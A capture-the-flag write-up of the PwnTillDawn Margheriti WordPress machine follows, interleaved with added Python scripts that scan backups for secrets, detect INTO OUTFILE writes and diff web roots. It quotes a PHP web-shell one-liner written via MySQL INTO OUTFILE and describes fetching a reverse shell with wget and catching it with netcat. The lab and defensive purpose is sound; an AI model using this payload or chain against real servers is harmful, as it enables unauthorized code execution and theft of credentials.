Hacking the Margheriti-Server — PwntillDawn CTF

Kwadwo Amoako
4 min read, Jan 10, 2022


Hi guys, welcome to what will be the first of many CTF and bug bounty write-ups to come. This write-up essentially captures (pun intended) how I found 5 flags on the Wizlynx Group’s PwnTillDawn online battlefield by exploiting a succession of weaknesses and vulnerabilities (in subsequent write-ups I will include possible remediations for the identified vulnerabilities). The methodology used in this attack may not necessarily be helpful in different attack scenarios.

The target website (E-CORP), with IP 10.150.150.145 as seen below, is a WordPress site.

Figure 1

Recon & Scanning

I began the attack by doing some active reconnaissance on the web application using the Nmap command "nmap -p 1-65535 -T4 -A -v 10.150.150.145", which scans all 65535 TCP ports and reports the open ports and the services running on them.

Figure 2

The result provided me with some interesting information. For the sake of this write-up, we will focus on port 3306, the default port for MySQL.

Next, I performed a directory brute-force attack using dirsearch to see if I could find any exposed sensitive files and folders (oh, and by the way, the importance of updating your wordlist cannot be overemphasized), and as luck would have it, I did. Always disable directory listing on WordPress. :-)

Figure 3

Downloading the "backup.zip" file and visiting the directory /wp-content/uploads/, I found my first and second flags. That was easy :)

Figure 4
Figure 5

This attack may seem trivial or "CTF-ish", but I have found exported/dumped databases with credentials in pentesting exercises I led in the past.

Login Bypass

Based on the recon done earlier, I tried out some SQLi attacks using the login parameters, but had no luck there. So I decided to go back to the content of the "backup.zip" file I had downloaded (see Figure 6) and have a second look at it.

Figure 6

Now, WordPress themes usually contain a lot of files, which obviously contain many lines of code, so it is important to know the function of each file before attempting to review it for critical information; this will save you a lot of time. With my focus on exploiting the MySQL service, I went straight for the wp-config.php file, which tells WordPress how to connect to its database, and BINGO! I got the database credentials (see Figure 7).

Figure 7
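The two finds above (a backup archive served from the web root, and a wp-config.php inside it carrying the database credentials; the plaintext WordPress-Account.txt found later is the same class of mistake) are both caught by a pre-publication check of the archive. The script below is an added example, not code from the write-up or from PwnTillDawn: it builds a constructed backup.zip in memory and flags members that should never sit under a web-served directory, either by name (wp-config.php, SQL dumps, .env, .htpasswd) or by content (DB_PASSWORD defines, WordPress auth salts, "password:" lines). All file names and values inside the sample archive are made up for the example.

```python
"""Pre-publication check for WordPress backup archives.

Added example (not code from the write-up): before a backup archive is placed
anywhere a web server can serve it, scan it for files that expose secrets.
The archive below is constructed in memory so the script runs offline.
"""
import io
import re
import zipfile

# File-name patterns that should never ship in a web-accessible archive.
SENSITIVE_NAMES = [
    (re.compile(r"(^|/)wp-config\.php$"), "WordPress config: contains DB credentials"),
    (re.compile(r"\.sql(\.gz|\.zip)?$", re.I), "database dump"),
    (re.compile(r"(^|/)\.env$"), "environment file with secrets"),
    (re.compile(r"(^|/)\.htpasswd$"), "basic-auth password hashes"),
]

# Content patterns indicating embedded credentials (checked in text-like files only).
SECRET_CONTENT = [
    (re.compile(r"define\(\s*['\"]DB_PASSWORD['\"]"), "DB_PASSWORD define"),
    (re.compile(r"\b(password|passwd|pwd)\s*[:=]", re.I), "plaintext password assignment"),
    (re.compile(r"AUTH_KEY|SECURE_AUTH_KEY|NONCE_KEY"), "WordPress auth salts"),
]

TEXT_SUFFIXES = (".php", ".txt", ".sql", ".env", ".ini", ".conf", ".htpasswd")
MAX_READ = 1_048_576  # inspect at most 1 MiB per member


def scan_backup(zip_bytes: bytes) -> list:
    """Return one finding dict per (path, reason) for risky members of the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = info.filename
            for pattern, reason in SENSITIVE_NAMES:
                if pattern.search(path):
                    findings.append({"path": path, "reason": reason})
            if path.lower().endswith(TEXT_SUFFIXES):
                with zf.open(info) as fh:
                    text = fh.read(MAX_READ).decode("utf-8", errors="replace")
                for pattern, reason in SECRET_CONTENT:
                    if pattern.search(text):
                        findings.append({"path": path, "reason": reason})
    return sorted(findings, key=lambda f: (f["path"], f["reason"]))


def build_sample_archive() -> bytes:
    """Constructed sample backup: a benign theme file, wp-config.php, a creds note and a dump."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("wp-content/themes/demo/style.css", "/* Theme Name: Demo */")
        zf.writestr(
            "wp-config.php",
            "<?php\n"
            "define('DB_NAME', 'wordpress');\n"
            "define('DB_USER', 'wp_user');\n"
            "define('DB_PASSWORD', 'example-password');\n"  # constructed value
            "define('AUTH_KEY', 'example-salt');\n",
        )
        zf.writestr("WordPress-Account.txt", "username: admin\npassword: example123\n")
        zf.writestr("db/export.sql", "-- MySQL dump\nINSERT INTO wp_users VALUES (1, 'admin');\n")
    return buf.getvalue()


def main() -> None:
    for finding in scan_backup(build_sample_archive()):
        print(f"{finding['path']}: {finding['reason']}")


if __name__ == "__main__":
    main()
```

Run it as-is to see the five findings on the constructed archive; in practice you would feed it the real archive bytes and fail the deployment if `scan_backup` returns anything. The name checks catch files whose mere presence is a problem, while the content checks catch credentials copied into files with innocent names, which is exactly what a stray WordPress-Account.txt is.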

Using a personal favourite, DBeaver, I was able to establish a connection to the remote database, which let me view and edit its contents. On top of that, I found the third flag: a table name (see Figure 8).

Figure 8

Gaining Shell Access/RCE

Now, ultimately, the goal is to gain shell access and run commands on the remote server. So, leveraging the DB access, I ran the following statement: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/cmd.php", which wrote the file "cmd.php" into the html folder.
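From the defender's side, that INTO OUTFILE write only succeeds when three things line up: the database account holds the FILE privilege, the server's secure_file_priv variable permits writes to that directory (NULL disables file export entirely, an empty value allows any path mysqld can write, a directory value restricts exports to it), and the MySQL port is reachable at all (the Nmap scan earlier found 3306 open to the network). The script below is an added example, not code from the write-up: it scans constructed MySQL general-log lines for INTO OUTFILE / INTO DUMPFILE statements and rates any target under a web-served directory as critical, and it grades the two server variables that gate the technique. The web-root paths and the log lines are assumptions made for the example.

```python
"""Detection and hardening check for MySQL file-write abuse (INTO OUTFILE).

Added example, not code from the write-up.  Two defender-side helpers:
  * detect_outfile_writes() scans MySQL general-log lines for INTO OUTFILE /
    INTO DUMPFILE statements whose target lies under a web-served directory.
  * assess_mysql_settings() grades the server variables that decide whether
    that write is possible from the network at all.
The log lines and settings below are constructed for the example.
"""
import re

# Directories the web server executes PHP from (assumption: common Linux layouts).
WEB_ROOTS = ("/var/www/", "/srv/www/", "/usr/share/nginx/html/")

# Matches INTO OUTFILE 'path' / INTO DUMPFILE "path", case-insensitive.
OUTFILE_RE = re.compile(r"""INTO\s+(OUTFILE|DUMPFILE)\s+(['"])(.+?)\2""", re.I)

# MySQL 5.7+/8.0 general log line: "<timestamp>\t<thread id> <command>\t<argument>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

# Constructed sample log: a normal WordPress query, a web-shell drop, a legitimate export.
SAMPLE_LOG = [
    "2022-01-10T21:03:11.000000Z\t   12 Connect\twp_user@10.150.150.1 on wordpress using TCP/IP",
    "2022-01-10T21:03:12.000000Z\t   12 Query\tSELECT option_value FROM wp_options WHERE option_name = 'siteurl'",
    "2022-01-10T21:05:40.000000Z\t   12 Query\tSELECT '<?php /* webshell body */ ?>' INTO OUTFILE '/var/www/html/cmd.php'",
    "2022-01-10T21:06:02.000000Z\t   12 Query\tSELECT * FROM wp_posts INTO OUTFILE '/var/lib/mysql-files/posts.csv'",
]


def detect_outfile_writes(lines):
    """Return one alert per server-side file write found in general-log Query lines."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        for hit in OUTFILE_RE.finditer(m.group("arg")):
            target = hit.group(3)
            # A write under a web root is a code-execution primitive; elsewhere it is
            # still FILE-privilege use worth reviewing (exfiltration or staging).
            severity = "critical" if target.startswith(WEB_ROOTS) else "medium"
            alerts.append({"ts": m.group("ts"), "thread": m.group("thread"),
                           "kind": hit.group(1).upper(), "target": target,
                           "severity": severity})
    return alerts


def assess_mysql_settings(secure_file_priv, bind_address):
    """Grade the settings that gate INTO OUTFILE abuse from the network.

    secure_file_priv: None (shown as NULL) disables import/export entirely; ''
    allows writes to any mysqld-writable path; a directory restricts exports to it.
    bind_address: 127.0.0.1 keeps the service off the network (port 3306 closed remotely).
    """
    issues = []
    if secure_file_priv is None:
        pass  # file export disabled: strongest setting
    elif secure_file_priv == "":
        issues.append("secure_file_priv is empty: INTO OUTFILE may write to any mysqld-writable path")
    elif secure_file_priv.rstrip("/").startswith(tuple(r.rstrip("/") for r in WEB_ROOTS)):
        issues.append(f"secure_file_priv={secure_file_priv} lies under a web root")
    if bind_address in ("0.0.0.0", "::", "*"):
        issues.append(f"bind_address={bind_address}: MySQL is reachable from the network")
    return issues


if __name__ == "__main__":
    for alert in detect_outfile_writes(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['ts']} thread {alert['thread']} "
              f"{alert['kind']} -> {alert['target']}")
    for issue in assess_mysql_settings("", "0.0.0.0"):
        print("config:", issue)
```

The general log is off by default and verbose, so in production the same regex is better pointed at an audit-plugin log or at the binary log; the matching logic does not change. Revoking FILE from the WordPress database user removes the primitive regardless of what the server variables say.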

Now, time to test it. Using the "ls" Linux command, I was able to view a list of the files and folders in the "html" folder (see Figure 9).

Figure 9

Excluding the backup.zip file, which I had already downloaded, the WordPress-Account.txt file was the only file that seemed interesting or out of place, so I ran "cat WordPress-Account.txt" and, as you can probably guess, got the username and password :-D.

Figure 10

I logged in using the credentials and got the fourth flag on the dashboard :)

Figure 11

I suspected that the last flag would be outside the "html" folder, somewhere else on the server. The RCE established earlier using the cmd.php file could not help me traverse out of the "html" folder. So I went on to host a web server using SimpleHTTPServer and downloaded the reverse shell script from my machine onto the victim's server using the "wget" command (see Figure 12).

Figure 12

Then I started a netcat listener on my machine, and upon opening http://10.150.150.145/mado.php in the browser, a reverse shell was established.
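Both footholds in this write-up, cmd.php written by the database and mado.php fetched with wget, look identical to a defender: a PHP file under the web root that was not part of the deployment. The script below is an added example, not code from the write-up: it baselines a web root by hashing every file, then reports added, modified or removed files, rating any new or changed PHP file as critical when it sits directly in the web root or under wp-content/uploads (which should only ever hold data) and high elsewhere. The directory tree is constructed in a temporary folder so it runs offline; the file names inside it are made up for the example.

```python
"""Web-root integrity check: spot dropped or modified PHP files.

Added example, not code from the write-up.  Baseline a web root after
deployment, re-snapshot on a schedule, and alert on executable files that
appeared or changed.  The tree below is constructed in a temporary directory.
"""
import hashlib
import os
import tempfile

# Directories that must hold data only; any PHP here is a dropped shell until proven otherwise.
NO_PHP_DIRS = ("wp-content/uploads",)
PHP_SUFFIXES = (".php", ".phtml", ".php5", ".phar")


def snapshot(root):
    """Map relative path -> SHA-256 for every regular file under root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                result[rel] = hashlib.sha256(fh.read()).hexdigest()
    return result


def diff_snapshots(baseline, current):
    """Return findings for added, modified or removed files, with a severity."""
    findings = []
    for path in sorted(set(baseline) | set(current)):
        if path not in baseline:
            change = "added"
        elif path not in current:
            change = "removed"
        elif baseline[path] != current[path]:
            change = "modified"
        else:
            continue  # unchanged
        is_php = path.lower().endswith(PHP_SUFFIXES)
        if is_php and change in ("added", "modified"):
            top_level = "/" not in path
            severity = "critical" if (top_level or path.startswith(NO_PHP_DIRS)) else "high"
        else:
            severity = "info"
        findings.append({"path": path, "change": change, "severity": severity})
    return findings


def demo():
    """Build a constructed web root, baseline it, simulate the two drops, and diff."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(data)

        # Deployed state (constructed).
        write("index.php", "<?php require 'wp-blog-header.php';")
        write("wp-content/themes/demo/functions.php", "<?php // theme")
        write("wp-content/uploads/2022/01/logo.png", "PNG-placeholder")
        baseline = snapshot(root)

        # Later state: a shell dropped at top level, one fetched into uploads, a theme file edited.
        write("cmd.php", "<?php /* dropped via INTO OUTFILE */")
        write("wp-content/uploads/mado.php", "<?php /* fetched with wget */")
        write("wp-content/themes/demo/functions.php", "<?php // theme\n// injected line")
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for f in demo():
        print(f"[{f['severity']}] {f['change']}: {f['path']}")
```

Store the baseline outside the web root (the attacker in this write-up could read and overwrite anything under html), and pair the check with a web-server rule that refuses to execute PHP from wp-content/uploads at all, so a dropped file there is inert even before the next scan runs.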

Using "find -name FLAG6.txt", I found the last flag :)

Figure 13

Your feedback on this write-up will be very much appreciated.

Disclaimer: This write-up is for educational purposes only. I am in no way responsible for its misuse.

Contact:

LinkedIn
